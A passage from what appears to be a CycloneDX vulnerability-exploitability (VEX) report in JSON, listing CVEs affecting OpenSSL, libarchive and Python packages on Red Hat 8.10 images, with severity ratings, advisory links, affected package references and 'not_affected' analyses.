          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-15469",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        347
      ],
      "description": "Issue summary: The 'openssl dgst' command-line tool silently truncates input\ndata to 16MB when using one-shot signing algorithms and reports success instead\nof an error.\n\nImpact summary: A user signing or verifying files larger than 16MB with\none-shot algorithms (such as Ed25519, Ed448, or ML-DSA) may believe the entire\nfile is authenticated while trailing data beyond 16MB remains unauthenticated.\n\nWhen the 'openssl dgst' command is used with algorithms that only support\none-shot signing (Ed25519, Ed448, ML-DSA-44, ML-DSA-65, ML-DSA-87), the input\nis buffered with a 16MB limit. If the input exceeds this limit, the tool\nsilently truncates to the first 16MB and continues without signaling an error,\ncontrary to what the documentation states. This creates an integrity gap where\ntrailing bytes can be modified without detection if both signing and\nverification are performed using the same affected codepath.\n\nThe issue affects only the command-line tool behavior. Verifiers that process\nthe full message using library APIs will reject the signature, so the risk\nprimarily affects workflows that both sign and verify with the affected\n'openssl dgst' command. Streaming digest algorithms for 'openssl dgst' and\nlibrary users are unaffected.\n\nThe FIPS modules in 3.5 and 3.6 are not affected by this issue, as the\ncommand-line tools are outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.5 and 3.6 are vulnerable to this issue.\n\nOpenSSL 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15469"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15469"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-v2vr-926q-29fr"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/310f305eb92ea8040d6b3cb75a5feeba8e6acf2f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a7936fa4bd23c906e1955a16a0a0ab39a4953a61"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-15469.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15469"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15469"
        }
      ],
      "published": "2026-01-27T16:16:14+00:00",
      "updated": "2026-06-17T08:37:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-1632",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        404,
        476
      ],
      "description": "A vulnerability was found in libarchive up to 3.7.7. It has been classified as problematic. This affects the function list of the file bsdunzip.c. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1632"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1632"
        },
        {
          "url": "https://github.com/Ekkosun/pocs/blob/main/bsdunzip-poc"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1632"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7454-1"
        },
        {
          "url": "https://vuldb.com/?ctiid.296619"
        },
        {
          "url": "https://vuldb.com/?id.296619"
        },
        {
          "url": "https://vuldb.com/?submit.496460"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1632"
        }
      ],
      "published": "2025-02-24T14:15:11+00:00",
      "updated": "2026-06-17T08:39:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-1795",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        116
      ],
      "description": "During an address list folding when a separating comma ends up on a folded line and that line is to be unicode-encoded then the separator itself is also unicode-encoded. Expected behavior is that the separating comma remains a plan comma. This can result in the address header being misinterpreted by some mail servers.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1795"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1795"
        },
        {
          "url": "https://github.com/python/cpython/commit/09fab93c3d857496c0bd162797fab816c311ee48"
        },
        {
          "url": "https://github.com/python/cpython/commit/70754d21c288535e86070ca7a6e90dcb670b8593"
        },
        {
          "url": "https://github.com/python/cpython/commit/9148b77e0af91cdacaa7fe3dfac09635c3fe9a74"
        },
        {
          "url": "https://github.com/python/cpython/commit/a4ef689ce670684ec132204b1cd03720c8e0a03d"
        },
        {
          "url": "https://github.com/python/cpython/commit/d4df3c55e4c5513947f907f24766b34d2ae8c090"
        },
        {
          "url": "https://github.com/python/cpython/issues/100884"
        },
        {
          "url": "https://github.com/python/cpython/pull/100885"
        },
        {
          "url": "https://github.com/python/cpython/pull/119099"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00013.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/MB62IZMEC3UM6SGHP5LET5JX2Y7H4ZUR/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1795"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7570-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1795"
        }
      ],
      "published": "2025-02-28T19:15:36+00:00",
